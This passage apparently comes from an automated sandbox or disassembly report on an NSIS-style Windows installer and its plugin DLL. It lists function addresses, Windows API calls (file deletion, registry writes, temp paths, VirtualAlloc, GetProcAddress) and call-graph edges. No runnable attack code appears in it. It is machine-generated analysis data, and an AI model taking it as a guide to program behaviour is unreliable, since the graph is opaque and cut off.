4937 4039b1 DialogBoxParamW 4935->4937 4938 40399b GetClassInfoW RegisterClassW 4935->4938 4939 403a06 4936->4939 4940 4039ee 4936->4940 4941 40140b 2 API calls 4937->4941 4938->4937 4942 40140b 2 API calls 4939->4942 4940->4915 4943 40140b 2 API calls 4940->4943 4941->4915 4942->4915 4943->4915 4944->4790 4945->4835 4946->4804 4948 403671 CloseHandle 4947->4948 4949 40367f 4947->4949 4948->4949 4984 4036ac 4949->4984 4952 4055ff 71 API calls 4953 4034c6 OleUninitialize 4952->4953 4953->4813 4953->4814 4954->4828 4955->4849 4956->4864 4957->4866 4958->4870 4960 402d26 4959->4960 4961 402d0e 4959->4961 4964 402d36 GetTickCount 4960->4964 4965 402d2e 4960->4965 4962 402d17 DestroyWindow 4961->4962 4963 402d1e 4961->4963 4962->4963 4963->4873 4967 402d44 CreateDialogParamW ShowWindow 4964->4967 4968 402d67 4964->4968 4966 40611a 2 API calls 4965->4966 4969 402d34 4966->4969 4967->4968 4968->4873 4969->4873 4970->4881 4971->4880 4973 403a2b 4972->4973 4983 405cbe wsprintfW 4973->4983 4975 403a9c 4976 405d99 18 API calls 4975->4976 4977 403aa8 SetWindowTextW 4976->4977 4978 4037cc 4977->4978 4979 403ac4 4977->4979 4978->4903 4979->4978 4980 405d99 18 API calls 4979->4980 4980->4979 4981->4900 4982->4905 4983->4975 4985 4036ba 4984->4985 4986 403684 4985->4986 4987 4036bf FreeLibrary GlobalFree 4985->4987 4986->4952 4987->4986 4987->4987 5292 402c7f 5293 402c91 SetTimer 5292->5293 5294 402caa 5292->5294 5293->5294 5295 402cff 5294->5295 5296 402cc4 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5294->5296 5296->5295 5297 4014ff 5298 401507 5297->5298 5300 40151a 5297->5300 5299 402b1d 18 API calls 5298->5299 5299->5300 5301 4036ff 5302 40370a 5301->5302 5303 403711 GlobalAlloc 5302->5303 5304 40370e 5302->5304 5303->5304 5305 401000 5306 401037 BeginPaint GetClientRect 5305->5306 5308 40100c DefWindowProcW 5305->5308 5309 4010f3 5306->5309 5310 401179 5308->5310 5311 401073 CreateBrushIndirect FillRect DeleteObject 5309->5311 5312 4010fc 5309->5312 5311->5309 5313 401102 CreateFontIndirectW 5312->5313 5314 401167 EndPaint 5312->5314 5313->5314 5315 401112 6 API calls 5313->5315 5314->5310 5315->5314 5316 401a00 5317 402b3a 18 API calls 5316->5317 5318 401a09 ExpandEnvironmentStringsW 5317->5318 5319 401a30 5318->5319 5320 401a1d 5318->5320 5320->5319 5321 401a22 lstrcmpW 5320->5321 5321->5319 5329 401b01 5330 402b3a 18 API calls 5329->5330 5331 401b08 5330->5331 5332 402b1d 18 API calls 5331->5332 5333 401b11 wsprintfW 5332->5333 5334 4029c7 5333->5334 5335 100018c1 5336 10001243 3 API calls 5335->5336 5337 100018e7 5336->5337 5338 10001243 3 API calls 5337->5338 5339 100018ef 5338->5339 5340 10001243 3 API calls 5339->5340 5343 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5339->5343 5341 10001916 5340->5341 5342 1000191f GlobalFree 5341->5342 5342->5343 5344 10001280 2 API calls 5343->5344 5345 10001aad GlobalFree GlobalFree 5344->5345 5346 406a02 5348 406250 5346->5348 5347 406bbb 5348->5347 5348->5348 5349 4062d1 GlobalFree 5348->5349 5350 4062da GlobalAlloc 5348->5350 5351 406351 GlobalAlloc 5348->5351 5352 406348 GlobalFree 5348->5352 5349->5350 5350->5347 5350->5348 5351->5347 5351->5348 5352->5351 5353 10002a43 5354 10002a5b 5353->5354 5355 100015a7 2 API calls 5354->5355 5356 10002a76 5355->5356 5357 401f08 5358 402b3a 18 API calls 5357->5358 5359 401f0f GetFileVersionInfoSizeW 5358->5359 5360 401f36 GlobalAlloc 5359->5360 5362 401f8c 5359->5362 5361 401f4a GetFileVersionInfoW 5360->5361 5360->5362 5361->5362 5363 401f59 VerQueryValueW 5361->5363 5363->5362 5364 401f72 5363->5364 5368 405cbe wsprintfW 5364->5368 5366 401f7e 5369 405cbe wsprintfW 5366->5369 5368->5366 5369->5362 5377 40410a lstrlenW 5378 404129 5377->5378 5379 40412b WideCharToMultiByte 5377->5379 5378->5379 5380 1000224c 5381 100022b1 5380->5381 5382 100022e7 5380->5382 5381->5382 5383 100022c3 GlobalAlloc 5381->5383 5383->5381 5384 100016ce 5385 100016fd 5384->5385 5386 10001b3e 24 API calls 5385->5386 5387 10001704 5386->5387 5388 10001717 5387->5388 5389 1000170b 5387->5389 5390 10001721 5388->5390 5391 1000173e 5388->5391 5392 10001280 2 API calls 5389->5392 5394 10001555 3 API calls 5390->5394 5395 10001744 5391->5395 5396 10001768 5391->5396 5393 10001715 5392->5393 5398 10001726 5394->5398 5399 100015cc 3 API calls 5395->5399 5397 10001555 3 API calls 5396->5397 5397->5393 5400 100015cc 3 API calls 5398->5400 5401 10001749 5399->5401 5402 1000172c 5400->5402 5403 10001280 2 API calls 5401->5403 5404 10001280 2 API calls 5402->5404 5405 1000174f GlobalFree 5403->5405 5406 10001732 GlobalFree 5404->5406 5405->5393 5407 10001763 GlobalFree 5405->5407 5406->5393 5407->5393 5408 401c8e 5409 402b1d 18 API calls 5408->5409 5410 401c94 IsWindow 5409->5410 5411 4019f0 5410->5411 5412 404410 5413 404420 5412->5413 5414 404446 5412->5414 5415 403fbc 19 API calls 5413->5415 5416 404023 8 API calls 5414->5416 5417 40442d SetDlgItemTextW 5415->5417 5418 404452 5416->5418 5417->5414 5419 401491 5420 405021 25 API calls 5419->5420 5421 401498 5420->5421 5422 402295 5423 402b3a 18 API calls 5422->5423 5424 4022a4 5423->5424 5425 402b3a 18 API calls 5424->5425 5426 4022ad 5425->5426 5427 402b3a 18 API calls 5426->5427 5428 4022b7 GetPrivateProfileStringW 5427->5428 5429 404f95 5430 404fa5 5429->5430 5431 404fb9 5429->5431 5432 405002 5430->5432 5433 404fab 5430->5433 5434 404fc1 IsWindowVisible 5431->5434 5440 404fd8 5431->5440 5435 405007 CallWindowProcW 5432->5435 5436 404008 SendMessageW 5433->5436 5434->5432 5437 404fce 5434->5437 5438 404fb5 5435->5438 5436->5438 5442 4048eb SendMessageW 5437->5442 5440->5435 5447 40496b 5440->5447 5443 40494a SendMessageW 5442->5443 5444 40490e GetMessagePos ScreenToClient SendMessageW 5442->5444 5445 404942 5443->5445 5444->5445 5446 404947 5444->5446 5445->5440 5446->5443 5456 405d77 lstrcpynW 5447->5456 5449 40497e 5457 405cbe wsprintfW 5449->5457 5451 404988 5452 40140b 2 API calls 5451->5452 5453 404991 5452->5453 5458 405d77 lstrcpynW 5453->5458 5455 404998 5455->5432 5456->5449 5457->5451 5458->5455 4538 401f98 4539 401faa 4538->4539 4549 40205c 4538->4549 4540 402b3a 18 API calls 4539->4540 4542 401fb1 4540->4542 4541 401423 25 API calls 4547 402197 4541->4547 4543 402b3a 18 API calls 4542->4543 4544 401fba 4543->4544 4545 401fd0 LoadLibraryExW 4544->4545 4546 401fc2 GetModuleHandleW 4544->4546 4548 401fe1 4545->4548 4545->4549 4546->4545 4546->4548 4561 40614d WideCharToMultiByte 4548->4561 4549->4541 4552 401ff2 4555 402011 4552->4555 4556 401ffa 4552->4556 4553 40202b 4554 405021 25 API calls 4553->4554 4557 402002 4554->4557 4564 10001771 4555->4564 4558 401423 25 API calls 4556->4558 4557->4547 4559 40204e FreeLibrary 4557->4559 4558->4557 4559->4547 4562 406177 GetProcAddress 4561->4562 4563 401fec 4561->4563 4562->4563 4563->4552 4563->4553 4565 100017a1 4564->4565 4606 10001b3e 4565->4606 4567 100017a8 4568 100018be 4567->4568 4569 100017c0 4567->4569 4570 100017b9 4567->4570 4568->4557 4640 100022eb 4569->4640 4658 100022a1 4570->4658 4575 10001824 4581 10001866 4575->4581 4582 1000182a 4575->4582 4576 10001806 4671 1000248d 4576->4671 4577 100017d6 4580 100017dc 4577->4580 4587 100017e7 4577->4587 4578 100017ef 4592 100017e5 4578->4592 4668 10002b23 4578->4668 4580->4592 4652 10002868 4580->4652 4585 1000248d 10 API calls 4581->4585 4583 100015cc 3 API calls 4582->4583 4589 10001840 4583->4589 4590 10001858 4585->4590 4662 1000260b 4587->4662 4595 1000248d 10 API calls 4589->4595 4605 100018ad 4590->4605 4694 10002450 4590->4694 4592->4575 4592->4576 4594 100017ed 4594->4592 4595->4590 4598 100018b7 GlobalFree 4598->4568 4602 10001899 4602->4605 4698 10001555 wsprintfW 4602->4698 4604 10001892 FreeLibrary 4604->4602 4605->4568 4605->4598 4701 1000121b GlobalAlloc 4606->4701 4608 10001b62 4702 1000121b GlobalAlloc 4608->4702 4610 10001b6d 4703 10001243 4610->4703 4612 10001da0 GlobalFree GlobalFree GlobalFree 4613 10001dbd 4612->4613 4622 10001e07 4612->4622 4615 1000210d 4613->4615 4613->4622 4625 10001dd2 4613->4625 4614 10001b75 4614->4612 4616 10001c43 GlobalAlloc 4614->4616 4618 10001c8e lstrcpyW 4614->4618 4619 10001cac GlobalFree 4614->4619 4614->4622 4623 10001c98 lstrcpyW 4614->4623 4626 10002067 4614->4626 4635 10001cea 4614->4635 4636 10001f56 GlobalFree 4614->4636 4637 1000122c 2 API calls 4614->4637 4713 1000121b GlobalAlloc 4614->4713 4617 1000212f GetModuleHandleW 4615->4617 4615->4622 4616->4614 4620 10002140 LoadLibraryW 4617->4620 4621 10002155 4617->4621 4618->4623 4619->4614 4620->4621 4620->4622 4714 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4621->4714 4622->4567 4623->4614 4625->4622 4710 1000122c 4625->4710 4626->4622 4634 100020af lstrcpyW 4626->4634 4627 100021a7 4627->4622 4628 100021b4 lstrlenW 4627->4628 4715 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4628->4715 4632 10002167 4632->4627 4639 10002191 GetProcAddress 4632->4639 4633 100021ce 4633->4622 4634->4622 4635->4614 4708 100015a7 GlobalSize GlobalAlloc 4635->4708 4636->4614 4637->4614 4639->4627 4647 10002303 4640->4647 4641 1000122c GlobalAlloc lstrcpynW 4641->4647 4642 10001243 3 API calls 4642->4647 4644 10002419 GlobalFree 4645 100017c6 4644->4645 4644->4647 4645->4577 4645->4578 4645->4592 4646 100023d5 GlobalAlloc WideCharToMultiByte 4646->4644 4647->4641 4647->4642 4647->4644 4647->4646 4648 100023ae GlobalAlloc 4647->4648 4649 10002390 lstrlenW 4647->4649 4718 100012c8 4647->4718 4650 1000239b 4648->4650 4649->4644 4649->4650 4650->4644 4723 1000259f 4650->4723 4654 1000287a 4652->4654 4653 1000291f VirtualAlloc 4655 1000293d 4653->4655 4654->4653 4656 10002a39 4655->4656 4657 10002a2e GetLastError 4655->4657 4656->4592 4657->4656 4659 100022b1 4658->4659 4660 100017bf 4658->4660 4659->4660 4661 100022c3 GlobalAlloc 4659->4661 4660->4569 4661->4659 4666 10002627 4662->4666 4663 10002678 GlobalAlloc 4667 1000269a 4663->4667 4664 1000268b 4665 10002690 GlobalSize 4664->4665 4664->4667 4665->4667 4666->4663 4666->4664 4667->4594 4669 10002b2e 4668->4669 4670 10002b6e GlobalFree 4669->4670 4675 100024ad 4671->4675 4673 100024db wsprintfW 4673->4675 4674 10002558 GlobalFree 4674->4675 4675->4673 4675->4674 4676 1000250e MultiByteToWideChar 4675->4676 4677 10002581 GlobalFree 4675->4677 4679 100024fd lstrcpynW 4675->4679 4680 100024ec StringFromGUID2 4675->4680 4681 10001280 2 API calls 4675->4681 4726 1000121b GlobalAlloc 4675->4726 4727 100012f3 4675->4727 4676->4675 4677->4675 4678 1000180c 4677->4678 4683 100015cc 4678->4683 4679->4675 4680->4675 4681->4675 4731 1000121b GlobalAlloc 4683->4731 4685 100015d2 4687 100015df lstrcpyW 4685->4687 4688 100015f9 4685->4688 4689 10001613 4687->4689 4688->4689 4690 100015fe wsprintfW 4688->4690 4691 10001280 4689->4691 4690->4689 4692 100012c3 GlobalFree 4691->4692 4693 10001289 GlobalAlloc lstrcpynW 4691->4693 4692->4590 4693->4692 4695 1000245e 4694->4695 4697 10001879 4694->4697 4696 1000247a GlobalFree 4695->4696 4695->4697 4696->4695 4697->4602 4697->4604 4699 10001280 2 API calls 4698->4699 4700 10001576 4699->4700 4700->4605 4701->4608 4702->4610 4704 1000127c 4703->4704 4705 1000124d 4703->4705 4704->4614 4705->4704 4716 1000121b GlobalAlloc 4705->4716 4707 10001259 lstrcpyW GlobalFree 4707->4614 4709 100015c5 4708->4709 4709->4635 4717 1000121b GlobalAlloc 4710->4717 4712 1000123b lstrcpynW 4712->4622 4713->4614 4714->4632 4715->4633 4716->4707 4717->4712 4719 100012d0 4718->4719 4720 100012ee 4718->4720 4719->4720 4721 1000122c 2 API calls 4719->4721 4720->4720 4722 100012ec 4721->4722 4722->4647 4724 10002603 4723->4724 4725 100025ad VirtualAlloc 4723->4725 4724->4650 4725->4724 4726->4675 4728 10001324 4727->4728 4729 100012fc 4727->4729 4728->4675 4729->4728 4730 10001308 lstrcpyW 4729->4730 4730->4728 4731->4685 5459 10001058 5460 10001243 3 API calls 5459->5460 5462 10001074 5460->5462 5461 100010dd 5462->5461 5463 10001092 5462->5463 5464 1000152e 4 API calls 5462->5464 5465 1000152e 4 API calls 5463->5465 5464->5463 5466 100010a2 5465->5466 5467 100010b2 5466->5467 5468 100010a9 GlobalSize 5466->5468 5469 100010b6 GlobalAlloc 5467->5469 5470 100010c7 5467->5470 5468->5467 5471 10001555 3 API calls 5469->5471 5472 100010d2 GlobalFree 5470->5472 5471->5470 5472->5461 5473 401718 5474 402b3a 18 API calls 5473->5474 5475 40171f SearchPathW 5474->5475 5476 40173a 5475->5476 4751 40159b 4752 402b3a 18 API calls 4751->4752 4753 4015a2 SetFileAttributesW 4752->4753 4754 4015b4 4753->4754 5484 40499d GetDlgItem GetDlgItem 5485 4049ef 7 API calls 5484->5485 5491 404c08 5484->5491 5486 404a92 DeleteObject 5485->5486 5487 404a85 SendMessageW 5485->5487 5488 404a9b 5486->5488 5487->5486 5489 404ad2 5488->5489 5490 405d99 18 API calls 5488->5490 5492 403fbc 19 API calls 5489->5492 5494 404ab4 SendMessageW SendMessageW 5490->5494 5497 404cec 5491->5497 5501 4048eb 5 API calls 5491->5501 5517 404c79 5491->5517 5496 404ae6 5492->5496 5493 404d98 5495 404da2 SendMessageW 5493->5495 5500 404daa 5493->5500 5494->5488 5495->5500 5502 403fbc 19 API calls 5496->5502 5497->5493 5503 404d45 SendMessageW 5497->5503 5527 404bfb 5497->5527 5498 404023 8 API calls 5504 404f8e 5498->5504 5499 404cde SendMessageW 5499->5497 5505 404dc3 5500->5505 5506 404dbc ImageList_Destroy 5500->5506 5514 404dd3 5500->5514 5501->5517 5518 404af4 5502->5518 5508 404d5a SendMessageW 5503->5508 5503->5527 5509 404dcc GlobalFree 5505->5509 5505->5514 5506->5505 5507 404f42 5512 404f54 ShowWindow GetDlgItem ShowWindow 5507->5512 5507->5527 5511 404d6d 5508->5511 5509->5514 5510 404bc9 GetWindowLongW SetWindowLongW 5513 404be2 5510->5513 5519 404d7e SendMessageW 5511->5519 5512->5527 5515 404c00 5513->5515 5516 404be8 ShowWindow 5513->5516 5514->5507 5526 40496b 4 API calls 5514->5526 5531 404e0e 5514->5531 5536 403ff1 SendMessageW 5515->5536 5535 403ff1 SendMessageW 5516->5535 5517->5497 5517->5499 5518->5510 5520 404bc3 5518->5520 5523 404b44 SendMessageW 5518->5523 5524 404b80 SendMessageW 5518->5524 5525 404b91 SendMessageW 5518->5525 5519->5493 5520->5510 5520->5513 5523->5518 5524->5518 5525->5518 5526->5531 5527->5498 5528 404f18 InvalidateRect 5528->5507 5529 404f2e 5528->5529 5532 404805 21 API calls 5529->5532 5530 404e3c SendMessageW 5534 404e52 5530->5534 5531->5530 5531->5534 5532->5507 5533 404ec6 SendMessageW SendMessageW 5533->5534 5534->5528 5534->5533 5535->5527 5536->5491 5537 40149e 5538 4014ac PostQuitMessage 5537->5538 5539 40223e 5537->5539 5538->5539 5540 40479f 5541 4047cb 5540->5541 5542 4047af 5540->5542 5543 4047d1 SHGetPathFromIDListW 5541->5543 5544 4047fe 5541->5544 5551 405537 GetDlgItemTextW 5542->5551 5546 4047e1 5543->5546 5547 4047e8 SendMessageW 5543->5547 5549 40140b 2 API calls 5546->5549 5547->5544 5548 4047bc SendMessageW 5548->5541 5549->5547 5551->5548 5552 4021a0 5553 402b3a 18 API calls 5552->5553 5554 4021a6 5553->5554 5555 402b3a 18 API calls 5554->5555 5556 4021af 5555->5556 5557 402b3a 18 API calls 5556->5557 5558 4021b8 5557->5558 5559 4060ba 2 API calls 5558->5559 5560 4021c1 5559->5560 5561 4021d2 lstrlenW lstrlenW 5560->5561 5562 4021c5 5560->5562 5564 405021 25 API calls 5561->5564 5563 405021 25 API calls 5562->5563 5565 4021cd 5562->5565 5563->5565 5566 402210 SHFileOperationW 5564->5566 5566->5562 5566->5565 5567 100010e1 5568 10001111 5567->5568 5569 10001243 3 API calls 5568->5569 5572 10001121 5569->5572 5570 100011d8 GlobalFree 5571 100012c8 2 API calls 5571->5572 5572->5570 5572->5571 5573 100011d3 5572->5573 5574 10001243 3 API calls 5572->5574 5575 10001280 2 API calls 5572->5575 5576 10001164 GlobalAlloc 5572->5576 5577 100011f8 GlobalFree 5572->5577 5578 100011c4 GlobalFree 5572->5578 5579 100012f3 lstrcpyW 5572->5579 5573->5570 5574->5572 5575->5578 5576->5572 5577->5572 5578->5572 5579->5572 4078 401b22 4079 401b73 4078->4079 4080 401b2f 4078->4080 4081 401b78 4079->4081 4082 401b9d GlobalAlloc 4079->4082 4083 401bb8 4080->4083 4086 401b46 4080->4086 4093 40223e 4081->4093 4099 405d77 lstrcpynW 4081->4099 4084 405d99 18 API calls 4082->4084 4085 405d99 18 API calls 4083->4085 4083->4093 4084->4083 4088 402238 4085->4088 4097 405d77 lstrcpynW 4086->4097 4100 405553 4088->4100 4090 401b8a GlobalFree 4090->4093 4092 401b55 4098 405d77 lstrcpynW 4092->4098 4095 401b64 4104 405d77 lstrcpynW 4095->4104 4097->4092 4098->4095 4099->4090 4101 405568 4100->4101 4102 4055b4 4101->4102 4103 40557c MessageBoxIndirectW 4101->4103 4102->4093 4103->4102 4104->4093 5580 4029a2 SendMessageW 5581 4029c7 5580->5581 5582 4029bc InvalidateRect 5580->5582 5582->5581 4105 401924 4106 401926 4105->4106 4107 402b3a 18 API calls 4106->4107 4108 40192b 4107->4108 4111 4055ff 4108->4111 4150 4058ca 4111->4150 4114 405627 DeleteFileW 4116 401934 4114->4116 4115 40563e 4118 40575e 4115->4118 4164 405d77 lstrcpynW 4115->4164 4118->4116 4183 4060ba FindFirstFileW 4118->4183 4119 405664 4120 405677 4119->4120 4121 40566a lstrcatW 4119->4121 4165 40580e lstrlenW 4120->4165 4122 40567d 4121->4122 4125 40568d lstrcatW 4122->4125 4127 405698 lstrlenW FindFirstFileW 4122->4127 4125->4127 4127->4118 4134 4056ba 4127->4134 4128 405787 4186 4057c2 lstrlenW CharPrevW 4128->4186 4131 405741 FindNextFileW 4131->4134 4135 405757 FindClose 4131->4135 4132 4055b7 5 API calls 4136 405799 4132->4136 4134->4131 4148 405702 4134->4148 4169 405d77 lstrcpynW 4134->4169 4135->4118 4137 4057b3 4136->4137 4138 40579d 4136->4138 4140 405021 25 API calls 4137->4140 4138->4116 4141 405021 25 API calls 4138->4141 4140->4116 4143 4057aa 4141->4143 4142 4055ff 64 API calls 4142->4148 4145 405c11 40 API calls 4143->4145 4144 405021 25 API calls 4144->4131 4146 4057b1 4145->4146 4146->4116 4147 405021 25 API calls 4147->4148 4148->4131 4148->4142 4148->4144 4148->4147 4170 4055b7 4148->4170 4178 405c11 4148->4178 4189 405d77 lstrcpynW 4150->4189 4152 4058db 4190 40586d CharNextW CharNextW 4152->4190 4155 40561f 4155->4114 4155->4115 4156 40600b 5 API calls 4162 4058f1 4156->4162 4157 405922 lstrlenW 4158 40592d 4157->4158 4157->4162 4160 4057c2 3 API calls 4158->4160 4159 4060ba 2 API calls 4159->4162 4161 405932 GetFileAttributesW 4160->4161 4161->4155 4162->4155 4162->4157 4162->4159 4163 40580e 2 API calls 4162->4163 4163->4157 4164->4119 4166 40581c 4165->4166 4167 405822 CharPrevW 4166->4167 4168 40582e 4166->4168 4167->4166 4167->4168 4168->4122 4169->4134 4196 4059be GetFileAttributesW 4170->4196 4173 4055e4 4173->4148 4174 4055d2 RemoveDirectoryW 4176 4055e0 4174->4176 4175 4055da DeleteFileW 4175->4176 4176->4173 4177 4055f0 SetFileAttributesW 4176->4177 4177->4173 4199 4060e1 GetModuleHandleA 4178->4199 4182 405c39 4182->4148 4184 4060d0 FindClose 4183->4184 4185 405783 4183->4185 4184->4185 4185->4116 4185->4128 4187 40578d 4186->4187 4188 4057de lstrcatW 4186->4188 4187->4132 4188->4187 4189->4152 4191 40588a 4190->4191 4192 40589c 4190->4192 4191->4192 4193 405897 CharNextW 4191->4193 4194 4057ef CharNextW 4192->4194 4195 4058c0 4192->4195 4193->4195 4194->4192 4195->4155 4195->4156 4197 4059d0 SetFileAttributesW 4196->4197 4198 4055c3 4196->4198 4197->4198 4198->4173 4198->4174 4198->4175 4200 406108 GetProcAddress 4199->4200 4201 4060fd LoadLibraryA 4199->4201 4202 405c18 4200->4202 4201->4200 4201->4202 4202->4182 4203 405a95 lstrcpyW 4202->4203 4204 405ae4 GetShortPathNameW 4203->4204 4205 405abe 4203->4205 4207 405af9 4204->4207 4208 405c0b 4204->4208 4228 4059e3 GetFileAttributesW CreateFileW 4205->4228 4207->4208 4210 405b01 wsprintfA 4207->4210 4208->4182 4209 405ac8 CloseHandle GetShortPathNameW 4209->4208 4211 405adc 4209->4211 4212 405d99 18 API calls 4210->4212 4211->4204 4211->4208 4213 405b29 4212->4213 4229 4059e3 GetFileAttributesW CreateFileW 4213->4229 4215 405b36 4215->4208 4216 405b45 GetFileSize GlobalAlloc 4215->4216 4217 405c04 CloseHandle 4216->4217 4218 405b67 4216->4218 4217->4208 4230 405a66 ReadFile 4218->4230 4223 405b86 lstrcpyA 4226 405ba8 4223->4226 4224 405b9a 4225 405948 4 API calls 4224->4225 4225->4226 4227 405bdf SetFilePointer WriteFile GlobalFree 4226->4227 4227->4217 4228->4209 4229->4215 4231 405a84 4230->4231 4231->4217 4232 405948 lstrlenA 4231->4232 4233 405989 lstrlenA 4232->4233 4234 405991 4233->4234 4235 405962 lstrcmpiA 4233->4235 4234->4223 4234->4224 4235->4234 4236 405980 CharNextA 4235->4236 4236->4233 5583 402224 5584 40223e 5583->5584 5585 40222b 5583->5585 5586 405d99 18 API calls 5585->5586 5587 402238 5586->5587 5588 405553 MessageBoxIndirectW 5587->5588 5588->5584 5589 10001667 5590 1000152e 4 API calls 5589->5590 5593 1000167f 5590->5593 5591 100016c5 GlobalFree 5592 1000169a 5592->5591 5593->5591 5593->5592 5594 100016b1 VirtualFree 5593->5594 5594->5591 5595 402729 5596 402730 5595->5596 5597 4029c7 5595->5597 5598 402736 FindClose 5596->5598 5598->5597 5599 401cab 5600 402b1d 18 API calls 5599->5600 5601 401cb2 5600->5601 5602 402b1d 18 API calls 5601->5602 5603 401cba GetDlgItem 5602->5603 5604 4024e8 5603->5604 5605 4016af 5606 402b3a 18 API calls 5605->5606 5607 4016b5 GetFullPathNameW 5606->5607 5608 4016cf 5607->5608 5614 4016f1 5607->5614 5611 4060ba 2 API calls 5608->5611 5608->5614 5609 401706 GetShortPathNameW 5610 4029c7 5609->5610 5612 4016e1 5611->5612 5612->5614 5615 405d77 lstrcpynW 5612->5615 5614->5609 5614->5610 5615->5614 4383 402331 4384 402337 4383->4384 4385 402b3a 18 API calls 4384->4385 4386 402349 4385->4386 4387 402b3a 18 API calls 4386->4387 4388 402353 RegCreateKeyExW 4387->4388 4389 40237d 4388->4389 4392 402793 4388->4392 4390 402398 4389->4390 4393 402b3a 18 API calls 4389->4393 4391 4023a4 4390->4391 4394 402b1d 18 API calls 4390->4394 4395 4023bf RegSetValueExW 4391->4395 4400 402fa2 4391->4400 4396 40238e lstrlenW 4393->4396 4394->4391 4398 4023d5 RegCloseKey 4395->4398 4396->4390 4398->4392 4401 402fbb 4400->4401 4402 402fe6 4401->4402 4432 4031b4 SetFilePointer 4401->4432 4422 40319e 4402->4422 4406 403132 4408 403136 4406->4408 4413 40314e 4406->4413 4407 403003 GetTickCount 4419 403016 4407->4419 4410 40319e ReadFile 4408->4410 4409 40311d 4409->4395 4410->4409 4411 40319e ReadFile 4411->4413 4412 40319e ReadFile 4412->4419 4413->4409 4413->4411 4414 403169 WriteFile 4413->4414 4414->4409 4415 40317e 4414->4415 4415->4409 4415->4413 4417 40307c GetTickCount 4417->4419 4418 4030a5 MulDiv wsprintfW 4420 405021 25 API calls 4418->4420 4419->4409 4419->4412 4419->4417 4419->4418 4421 4030e9 WriteFile 4419->4421 4425 40621d 4419->4425 4420->4419 4421->4409 4421->4419 4423 405a66 ReadFile 4422->4423 4424 402ff1 4423->4424 4424->4406 4424->4407 4424->4409 4426 406242 4425->4426 4427 40624a 4425->4427 4426->4419 4427->4426 4428 4062d1 GlobalFree 4427->4428 4429 4062da GlobalAlloc 4427->4429 4430 406351 GlobalAlloc 4427->4430 4431 406348 GlobalFree 4427->4431 4428->4429 4429->4426 4429->4427 4430->4426 4430->4427 4431->4430 4432->4402 5623 4027b5 5624 402b3a 18 API calls 5623->5624 5625 4027c3 5624->5625 5626 4027d9 5625->5626 5627 402b3a 18 API calls 5625->5627 5628 4059be 2 API calls 5626->5628 5627->5626 5629 4027df 5628->5629 5649 4059e3 GetFileAttributesW CreateFileW 5629->5649 5631 4027ec 5632 402895 5631->5632 5633 4027f8 GlobalAlloc 5631->5633 5636 4028b0 5632->5636 5637 40289d DeleteFileW 5632->5637 5634 402811 5633->5634 5635 40288c CloseHandle 5633->5635 5650 4031b4 SetFilePointer 5634->5650 5635->5632 5637->5636 5639 402817 5640 40319e ReadFile 5639->5640 5641 402820 GlobalAlloc 5640->5641 5642 402830 5641->5642 5643 402864 WriteFile GlobalFree 5641->5643 5645 402fa2 37 API calls 5642->5645 5644 402fa2 37 API calls 5643->5644 5646 402889 5644->5646 5647 40283d 5645->5647 5646->5635 5648 40285b GlobalFree 5647->5648 5648->5643 5649->5631 5650->5639 5651 4028b6 5652 402b1d 18 API calls 5651->5652 5653 4028bc 5652->5653 5654 4028f8 5653->5654 5655 4028df 5653->5655 5661 402793 5653->5661 5656 402902 5654->5656 5657 40290e 5654->5657 5658 4028e4 5655->5658 5664 4028f5 5655->5664 5659 402b1d 18 API calls 5656->5659 5660 405d99 18 API calls 5657->5660 5665 405d77 lstrcpynW 5658->5665 5659->5664 5660->5664 5664->5661 5666 405cbe wsprintfW 5664->5666 5665->5661 5666->5661 5667 4014b8 5668 4014be 5667->5668 5669 401389 2 API calls 5668->5669 5670 4014c6 5669->5670 4732 4015b9 4733 402b3a 18 API calls 4732->4733 4734 4015c0 4733->4734 4735 40586d 4 API calls 4734->4735 4744 4015c9 4735->4744 4736 401614 4737 401646 4736->4737 4738 401619 4736->4738 4743 401423 25 API calls 4737->4743 4740 401423 25 API calls 4738->4740 4739 4057ef CharNextW 4741 4015d7 CreateDirectoryW 4739->4741 4742 401620 4740->4742 4741->4744 4745 4015ed GetLastError 4741->4745 4750 405d77 lstrcpynW 4742->4750 4749 40163e 4743->4749 4744->4736 4744->4739 4745->4744 4747 4015fa GetFileAttributesW 4745->4747 4747->4744 4748 40162d SetCurrentDirectoryW 4748->4749 4750->4748 5671 401939 5672 402b3a 18 API calls 5671->5672 5673 401940 lstrlenW 5672->5673 5674 4024e8 5673->5674 5675 40293b 5676 402b1d 18 API calls 5675->5676 5677 402941 5676->5677 5678 402974 5677->5678 5679 402793 5677->5679 5681 40294f 5677->5681 5678->5679 5680 405d99 18 API calls 5678->5680 5680->5679 5681->5679 5683 405cbe wsprintfW 5681->5683 5683->5679 4769 40173f 4770 402b3a 18 API calls 4769->4770 4771 401746 4770->4771 4775 405a12 4771->4775 4773 40174d 4774 405a12 2 API calls 4773->4774 4774->4773 4776 405a1f GetTickCount GetTempFileNameW 4775->4776 4777 405a59 4776->4777 4778 405a55 4776->4778 4777->4773 4778->4776 4778->4777

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 4031ff-403295 #17 SetErrorMode OleInitialize call 4060e1 SHGetFileInfoW call 405d77 GetCommandLineW call 405d77 GetModuleHandleW 7 403297-40329e 0->7 8 40329f-4032b1 call 4057ef CharNextW 0->8 7->8 11 40337f-403385 8->11 12 4032b6-4032bc 11->12 13 40338b 11->13 15 4032c5-4032cb 12->15 16 4032be-4032c3 12->16 14 40339f-4033b9 GetTempPathW call 4031cb 13->14 25 403411-40342b DeleteFileW call 402d69 14->25 26 4033bb-4033d9 GetWindowsDirectoryW lstrcatW call 4031cb 14->26 17 4032d2-4032d6 15->17 18 4032cd-4032d1 15->18 16->15 16->16 20 403370-40337b call 4057ef 17->20 21 4032dc-4032e2 17->21 18->17 20->11 36 40337d-40337e 20->36 23 4032e4-4032eb 21->23 24 4032fc-403313 21->24 28 4032f2 23->28 29 4032ed-4032f0 23->29 30 403341-403357 24->30 31 403315-40332b 24->31 40 4034c1-4034d0 call 403667 OleUninitialize 25->40 41 403431-403437 25->41 26->25 44 4033db-40340b GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031cb 26->44 28->24 29->24 29->28 30->20 39 403359-40336e 30->39 31->30 37 40332d-403335 31->37 36->11 42 403337-40333a 37->42 43 40333c 37->43 39->20 45 40338d-40339a call 405d77 39->45 57 